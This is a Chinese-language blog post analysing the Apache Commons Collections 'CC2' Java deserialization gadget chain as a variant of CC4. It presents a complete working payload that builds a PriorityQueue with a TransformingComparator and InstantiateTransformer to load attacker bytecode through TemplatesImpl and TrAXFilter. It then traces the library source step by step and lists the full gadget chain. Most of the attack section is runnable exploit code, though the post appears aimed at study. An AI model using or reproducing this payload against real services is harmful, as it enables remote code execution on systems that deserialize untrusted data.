cc2就是cc4的一个变种,无论是出口还是执行命令部分都没有改变,只是绕过了Chainedtransformer,直接将InstantiateTransformer和TransformingComparator去进行了衔接.
直接放我改后的payload
package org.example; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InstantiateTransformer; import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.*; import javax.xml.transform.Templates;
import java.io.*; public class Main { public static void main(String[] args) throws Exception{ TemplatesImpl templatesimpl = new TemplatesImpl(); Class<?> clazz = templatesimpl.getClass(); Field field = clazz.getDeclaredField("_name"); field.setAccessible(true); field.set(templatesimpl, "test"); Field field2 = clazz.getDeclaredField("_bytecodes"); field2.setAccessible(true); byte[] code = Files.readAllBytes(Paths.get("F:\\idea_workspace\\cc3\\target\\classes\\org\\example\\test.class")); byte[][] codes = {code}; field2.set(templatesimpl, codes); Field field3 = clazz.getDeclaredField("_tfactory"); field3.setAccessible(true); field3.set(templatesimpl, new TransformerFactoryImpl()); // ConstantTransformer ct = new ConstantTransformer(TrAXFilter.class);
// InstantiateTransformer it = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templatesimpl});
// Transformer[] transformers = {ct, it};
//
// ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
//
// TransformingComparator transformingComparator = new TransformingComparator(chainedTransformer);
// PriorityQueue pq = new PriorityQueue<>(transformingComparator); InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templatesimpl}); TransformingComparator transformingComparator = new TransformingComparator(instantiateTransformer); PriorityQueue pq = new PriorityQueue(transformingComparator); Class clazz1 = pq.getClass(); Field field1 = clazz1.getDeclaredField("size"); field1.setAccessible(true); field1.set(pq, 2); /* * 通过修改 PriorityQueue 的 queue 字段,来设置InstantiateTransformer的transform方法去构造的类 */ Class clazz0 = pq.getClass(); Field field0 = clazz0.getDeclaredField("queue"); field0.setAccessible(true); field0.set(pq, new Object[]{TrAXFilter.class, 2}); serial(pq); unserial(); } public static void serial(Object obj) throws IOException { ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("./cc1.bin")); out.writeObject(obj); } public static void unserial() throws IOException, ClassNotFoundException { ObjectInputStream in = new ObjectInputStream(new FileInputStream("./cc1.bin")); in.readObject(); }
}
感觉网上的改法五花八门的,所以就没看自己去改的.重点分析TrAXFilter.class如何从队列的一个参数传递到InstantiateTransformer的,这也是cc2相对cc4的不同之处.(cc4是直接通过ChainedTransformer来衔接的,不需要进行传递)
PriorityQueue
我们在cc4中分析过siftDownUsingComparator调用compare方法.
private void siftDownUsingComparator(int k, E x) { int half = size >>> 1; while (k < half) { int child = (k << 1) + 1; Object c = queue[child]; int right = child + 1; if (right < size && comparator.compare((E) c, (E) queue[right]) > 0) c = queue[child = right]; if (comparator.compare(x, (E) c) <= 0) break; queue[k] = c; k = child; } queue[k] = x;
}
发现compare方法的第二个参数传递的是(E) queue[right],也就是说他把队列中的一个元素传递了过去.
TransformingComparator
来看这个compare方法
public int compare(final I obj1, final I obj2) { final O value1 = this.transformer.transform(obj1); final O value2 = this.transformer.transform(obj2); return this.decorated.compare(value1, value2);
}
在接受到参数后,直接用参数执行了transform方法,也就是通过obj2将之前队列里的TrAXFilter传递给了InstantiateTransformer
InstantiateTransformer
直接看这个transform
public Object transform(Object input) {try {if (!(input instanceof Class)) {throw new FunctorException("InstantiateTransformer: Input object was not an instanceof Class, it was a " + (input == null ? "null object" : input.getClass().getName()));} else {Constructor con = ((Class)input).getConstructor(this.iParamTypes);return con.newInstance(this.iArgs);}} catch (NoSuchMethodException var3) {throw new FunctorException("InstantiateTransformer: The constructor must exist and be public ");} catch (InstantiationException var4) {InstantiationException ex = var4;throw new FunctorException("InstantiateTransformer: InstantiationException", ex);} catch (IllegalAccessException var5) {IllegalAccessException ex = var5;throw new FunctorException("InstantiateTransformer: Constructor must be public", ex);} catch (InvocationTargetException var6) {InvocationTargetException ex = var6;throw new FunctorException("InstantiateTransformer: Constructor threw an exception", ex);}}
此时已经非常明了了.获取TrAXFilter的构造方法并构建一个实例,而TrAXFilter的构造方法中触发了newTransformer,这里已经对接上了cc3.
归纳出利用链
Gadget chain:
PriorityQueue.readObject()PriorityQueue.heapify() PriorityQueue.siftDown()PriorityQueue.siftDownUsingComparator()TransformingComparator.compare()InstantiateTransformer.transform()TemplatesImpl.newTransformer()TemplatesImpl.getTransletInstance()TemplatesImpl.defineTransletClasses()TemplatesImpl.defineClass()
2024/11/14 模拟赛 A~B](https://img2024.cnblogs.com/blog/3322276/202411/3322276-20241114192729323-2036727298.png)
